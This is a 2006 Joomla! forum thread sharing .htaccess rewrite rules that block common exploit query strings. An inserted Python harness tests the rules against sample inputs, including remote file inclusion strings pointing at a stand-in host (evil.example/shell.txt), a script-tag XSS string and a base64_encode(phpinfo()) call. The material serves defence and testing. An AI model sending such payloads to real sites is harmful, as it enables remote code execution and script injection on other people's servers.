The Joomla! Forum ™






PostPosted: Sun Jul 09, 2006 12:14 am 
Joomla! Ace

Joined: Mon Dec 05, 2005 10:17 am
Posts: 1367
Location: New Orleans, LA, USA
Alright, so there are a lot of noticeable trends in how people exploit Joomla websites, and I have seen a lot of simple mod_rewrite configurations that attempt to address this issue, but in my opinion they were often too vague and could easily cause problems with the site's normal functions. Hence, I have tried to hash out a set of mod_rewrite conditions that you can tag onto the end of your .htaccess file that will hopefully block out a good number of the common exploit attempts while interfering as little as possible with legitimate usage.

Keep in mind, this is just a trial script; I have not had a whole lot of time to test it. You will know it is working correctly/incorrectly if you get forwarded to your home page and receive a 403 Forbidden error.

Append to .htaccess in the same directory as your index.php file.

Code:
########## Begin - Rewrite rules to block out some common exploits
#
# These conditions need mod_rewrite enabled earlier in the file (RewriteEngine On),
# which Joomla!'s stock .htaccess already does. %{QUERY_STRING} is matched raw,
# i.e. NOT URL-decoded, so each rule lists both the literal character and its %XX form.
# The conditions are chained with [OR]: any single match triggers the RewriteRule below.
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL ([NC] = case-insensitive)
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Answer every blocked request with 403 Forbidden. With the [F] flag Apache returns
# the 403 immediately and the rewrite target (index.php) is ignored; [L] stops rule processing.
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common exploits


* Edited last line as the F option is compatible with more versions of Apache than R=403 *
* Edited to include conditions to match recent com_simpleboard and com_extcalendar exploits *
* Edited to remove the conditions that matched com_simpleboard and com_extcalendar specifically *
* Last updated on August 2, 2006 1:35 AM PDT (UTC -8:00) *

I am of course open to comments and suggestions. Your site should still be very usable with this code in place because of how specific I have tried to make the conditions. For example, it will not block out a search string that includes GLOBALS, only one that includes something to the effect of GLOBALS=..., GLOBALS[..., or GLOBALS%20= (GLOBALS followed by a URL-encoded space), etc.

It attempts to deal with exploit attempts that try to set _REQUEST variables or GLOBALS variables, as well as those that use XSS vulnerabilities to include JavaScript within the URL. It also attempts to block any script trying to assign a value to a mosConfig variable, and scripts that try to base64_encode information to pass it through the URL.

If this breaks some feature of your site, just comment out the rules by placing a # in front of them and everything should go back to normal. Let me know what you were doing, copy and save the URL, and I will try to work through it and figure out a way to allow the legitimate requests.

Hope it helps some of you guys worried about your site's security.

This thread has been split in order to help keep the forum cleaned up. Please discuss this topic here:
http://forum.joomla.org/index.php/topic,76578.msg388696.html#msg388696

_________________
Rob Schley - Open Source Matters
Webimagery - http://www.webimagery.net/ - Professional Consulting Services
JXtended - http://www.jxtended.com/ - Free and Commercial Joomla! Extensions


Last edited by RobS on Wed Aug 02, 2006 8:40 am, edited 1 time in total.
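To see exactly which query strings the five RewriteCond lines above let through and which they reject, here is an added example that is not part of the original post or of Joomla!: it replays the posted patterns in Python's re module over a handful of constructed query strings (the host evil.example and the sample parameters are made up). Apache compiles CondPatterns with PCRE; none of these five patterns use a construct that Python reads differently, so they are copied verbatim, with [NC] mapped to re.IGNORECASE. The point it demonstrates is the one made in the post: a bare word such as GLOBALS in a search string passes, while GLOBALS=, GLOBALS[ and GLOBALS%20 are caught. Remember that the rules look only at the raw, still-percent-encoded query string; nothing in the path or in a POST body is inspected.

```python
import re
from typing import List, Optional, Tuple

# One entry per RewriteCond in the posted .htaccess snippet, in the order Apache
# evaluates them. The [NC] flag on the <script> rule becomes re.IGNORECASE; the
# other four stay case-sensitive, just as they are in the .htaccess file.
RULES: List[Tuple[str, str, int]] = [
    ("mosConfig",     r"mosConfig_[a-zA-Z_]{1,21}(=|\%3D)",  0),
    ("base64_encode", r"base64_encode.*\(.*\)",               0),
    ("script_tag",    r"(\<|%3C).*script.*(\>|%3E)",          re.IGNORECASE),
    ("GLOBALS",       r"GLOBALS(=|\[|\%[0-9A-Z]{0,2})",       0),
    ("_REQUEST",      r"_REQUEST(=|\[|\%[0-9A-Z]{0,2})",      0),
]
_COMPILED = [(name, re.compile(pattern, flags)) for name, pattern, flags in RULES]


def blocking_rule(query_string: str) -> Optional[str]:
    """Name of the first RewriteCond that matches, or None if the request passes.

    Pass the raw, still-percent-encoded query string: mod_rewrite does not
    URL-decode %{QUERY_STRING} before matching, which is why each rule lists
    both the literal character and its %XX form. The conditions are chained
    with [OR], so one hit is enough for the RewriteRule's [F] flag to fire.
    """
    for name, regex in _COMPILED:
        if regex.search(query_string):
            return name
    return None


def would_be_forbidden(query_string: str) -> bool:
    """True when the snippet would answer this query string with 403 Forbidden."""
    return blocking_rule(query_string) is not None


# Constructed sample query strings for the demonstration (not captured traffic;
# evil.example is a made-up host). First column: what a practitioner expects.
SAMPLES: List[Tuple[str, str]] = [
    # legitimate requests that must keep working
    ("allowed", "option=com_content&task=view&id=12&Itemid=2"),
    ("allowed", "option=com_search&searchword=GLOBALS"),              # bare word, nothing after it
    ("allowed", "option=com_search&searchword=javascript+tutorial"),  # 'script' but no '<' / %3C
    # attack patterns the rules are meant to stop
    ("blocked", "mosConfig_absolute_path=http://evil.example/shell.txt%3F"),
    ("blocked", "GLOBALS[mosConfig_absolute_path]=http://evil.example/shell.txt%3F"),
    ("blocked", "_REQUEST[option]=com_something"),
    ("blocked", "searchword=%3Cscript%3Ealert(1)%3C%2Fscript%3E"),
    ("blocked", "searchword=%3cSCRIPT%3e"),                           # [NC] makes case irrelevant
    ("blocked", "searchword=GLOBALS%20=1"),                           # URL-encoded space after GLOBALS
    ("blocked", "x=base64_encode(phpinfo())"),
]


def classify_samples() -> List[Tuple[str, str, Optional[str]]]:
    """Run every sample through the rules; returns (expected, query, matched_rule)."""
    return [(expected, qs, blocking_rule(qs)) for expected, qs in SAMPLES]


if __name__ == "__main__":
    for expected, qs, rule in classify_samples():
        verdict = "403 " + rule if rule else "pass"
        print(f"{expected:7} {verdict:18} {qs}")
```

Note that the GLOBALS[mosConfig_absolute_path]=... sample is stopped by the GLOBALS rule, not the mosConfig rule: the mosConfig pattern requires an = or %3D directly after the variable name, and here a ] intervenes. That is the kind of ordering detail to check before trusting any "404 versus 403" symptom in your own logs.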

PostPosted: Mon Aug 28, 2006 4:23 pm 
Joomla! Hero

Joined: Mon Aug 15, 2005 4:36 pm
Posts: 2756
Location: Marikina, Metro Manila, Philippines
These simple but effective .htaccess blocking rules are now part of the default .htaccess file in 1.0.11.

I highly encourage those using an older .htaccess to add this to their file.

_________________
Rey Gigataras
http://www.wizmediateam.com <-- great team of talented Web Designers and Programmers!
http://about.me/reygigataras <-- About Me :)
Partner, Business Development & Project Manager, Event Manager, Sports Coach :D

